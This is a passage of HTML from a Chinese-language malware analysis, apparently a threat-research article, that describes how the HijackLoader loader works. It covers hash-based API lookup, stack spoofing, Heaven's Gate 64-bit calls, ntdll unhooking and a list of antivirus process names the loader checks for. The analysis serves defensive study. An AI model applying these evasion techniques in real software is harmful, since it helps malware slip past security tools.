&#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该loader依次执行如下模块：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Ti（主模块）-&gt; SM-&gt;TinyCallProxy -&gt; TinyCallProxy-&gt; (创建进程C-R.exe)-&gt; modWriteFile -&gt; SM -&gt; AVDATA -&gt; rshell -&gt; ESAL -&gt; CUSTOMINJECT -&gt;CUSTOMINJECTPATH -&gt; TinyCallProxy -&gt; modCreateProcess-&gt;(创建进程Terana.exe)-&gt; TinyCallProxy -&gt; modCreateProcess-&gt;（创建进程chime.exe）</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Ti模块中实现了以下功能：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1、通过哈希校验动态导入kernel32、kernelbase和ntdll模块及其大量函数，保存在一个表中，在后续的调用中直接查表调用，避免静态特征被分析检测，Hijackloader中大量API都通过此方法调用。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100024062" class="rich_pages wxw-img" data-ratio="0.37" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=f9460177&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxwGRYzpHToefCRqjr2LO4fZxXibHs3gHnf7NKaQJgHNe4mYMJ2EQdicDA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图12  建立API间接调用表</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024063" class="rich_pages wxw-img" data-ratio="0.9327830188679245" data-type="png" data-w="848" src="https://wechat2rss.xlab.app/img-proxy/?k=2ab044b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxxKK03nGXdhDhUlUnEq09tYHrx6UAUZjSElEcHV7qlxR929rpFl4nBg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图13  模块查找：遍历PEB-&gt;ldr-&gt;InLoadOrderModuleList将模块名的CRC32哈希值与目标模块的CRC32 哈希值比对</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024064" class="rich_pages wxw-img" data-ratio="0.40489432703003336" data-type="png" data-w="899" src="https://wechat2rss.xlab.app/img-proxy/?k=9a361655&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxaGOdW0DmpZNADUhvekVrM322q5CKvkcDYdPrTk7rexalhcnAwGLz1w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图14  收集名称以Zw开头的系统调用</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2、该模块中使用了一种 “栈欺骗”技术来掩护受监控的敏感系统调用或内核级 API调用来源，使之看起来像是来自合法的系统调用。具体逻辑如下：</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">1)  通过跟踪EBP寄存器来回溯栈帧；</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">2)  获取返回地址（EBP+4），如果返回地址不是位于ntdll或kernalbase的的text节区内，则记录该返回地址；</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">3)  将返回地址替换为一个合法dll（d3d9.dll）的text节区内随机地址；</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4)  重复以上过程直到栈底限制或遇到连续三个返回地址都在ntdll或kernalbase的栈帧，说明上层调用已经回到系统代码，可以停止查找和替换。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">以上逻辑的具体实现如下：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024065" class="rich_pages wxw-img" data-ratio="0.4477777777777778" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=f3ac4722&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxPKkUtGw5lLUpU1hfEPRcF8iaRT6HlbF495ybIF3RXV70N36vlDibjZOQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024066" class="rich_pages wxw-img" data-ratio="0.61" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=4ada9617&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxVTWSAjJTwJWrLCichDnHUic2xhB5DuW6VrLDAkZRHIR4hleh4bCc4YiaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图15  栈欺骗实现过程</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">3、此外，该模块还使用了Heaven’s Gate即所谓“天堂之门”技术调用64位API。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024067" class="rich_pages wxw-img" data-ratio="0.5311111111111111" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=3cb61a2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxFTSmNDZp4y1yaU5NVP5t3icHtRmrucoTRYyTXib7VS7PV5qq1vibUbvcw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图16  Heaven’s Gate实现</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该技术原理为将 64位CS寄存器selector值0x33 压栈，获取 EIP 并压栈，调整返回地址指向后面的64位stub，最后使用far return 使CS被切换到0x33，进入64位模式。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100024068" class="rich_pages wxw-img" data-ratio="0.8811111111111111" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=1460f2b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxaj7iaqQEcqmiaAgP2Suwt5E5O743TOaTsBLuBpI8hIPktWXibmuibx0WcA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图17  通过天堂之门实现一次64位模式系统调用的过程</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4、模块中还实现了unhook功能：将当前加载的ntdll与纯净的ntdll的text节进行比较，并对call和jmp指令的目标地址进行检查比对，确定是否被hook，如果发现存在hook行为，则将当前加载的ntdll修改为纯净的ntdll内容。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100024069" class="rich_pages wxw-img" data-ratio="0.5677777777777778" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=17c065fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx8AupUUfjnPbbwlJ1wEx865cl3uQwCicW0wnfkHDedkMc0ibMBZJYZicow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p></div></div><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图18  unhook  ntdll的具体步骤</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024070" class="rich_pages wxw-img" data-ratio="0.6066666666666667" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=e43f0006&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx9OTRDkV2iafj3m2eaL145nFJRJDdGBJnNV4yURh5G0YvFdD409yUptw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图19  CUSTOMINJECT模块内是一个待注入的合法PE文件，用以将最终载荷注入</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024071" class="rich_pages wxw-img" data-ratio="0.13777777777777778" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=b9a42e59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxiaTialP4Ku0P0pHjn5xalAYkw8Lj0Gm9gpqTMKbWscPnw9a4ZQiannURw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图20  CUSTOMINJECTPATH模块内的配置信息则指定了这个PE的路径。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024072" class="rich_pages wxw-img" data-ratio="0.09333333333333334" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=aa5a8ee1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxCYV8G5Yz6seUwic7W6kIibc5f4SEnSWv6RibnpWiarhJekeW8XA4WIiaRJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图21  SM模块的内容相当简单，只有一个未来用作宿主程序的d3d9.dll的名字</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024073" class="rich_pages wxw-img" data-ratio="0.698237885462555" data-type="png" data-w="908" src="https://wechat2rss.xlab.app/img-proxy/?k=3651d4c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZx7cRicpwMV8sbVib4DvkHiaE28eskJ9ib10458W3mo5wNRRmom97rUwIkhw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图22  TinycallProxy模块用以实现对特定系统调用函数的调用的包装，可变长参数中包含了调用号</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">AVDATA模块主要包含了与杀毒软件进程名哈希值、执行流程标志位等配置数据，构成一个28字节的结构体。样本将AVDATA模块中的杀毒软件进程名的crc32哈希值与调用NtQuerySystemInformation 检索到的本机进程名哈希值进行比对，若发现一致，则改继续检查它的持久化或注入方法标志位，选择相应的执行流程。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">检索的杀毒软件进程名包括zhudongfangyu.exe（360）、360tray.exe（360）、avp.exe（卡巴斯基）、avastsvc.exe（avast）、vkise.exe（Comodo）、cis.exe（Comodo）、mbam.exe（Malwarebytes）等。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100024074" class="rich_pages wxw-img" data-ratio="0.460762331838565" data-type="png" data-w="892" src="https://wechat2rss.xlab.app/img-proxy/?k=b51ad0ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxMBmiaCdVIia2wCH3RL3ibxOlF2w12sMuAu14wic4LiaRicn7G0zibRTqhPPiag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图23  AVDATA模块中的数据</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024075" class="rich_pages wxw-img" data-ratio="0.5512249443207127" data-type="png" data-w="898" src="https://wechat2rss.xlab.app/img-proxy/?k=9d1ac36e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1XvjZtSK75SibvTLibiaBCZxPk5Bv4MX8icz3iaeialPstY7lbrrfa0NxJqHrcLFA0OfPnRib7bibVIzib3g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-size: 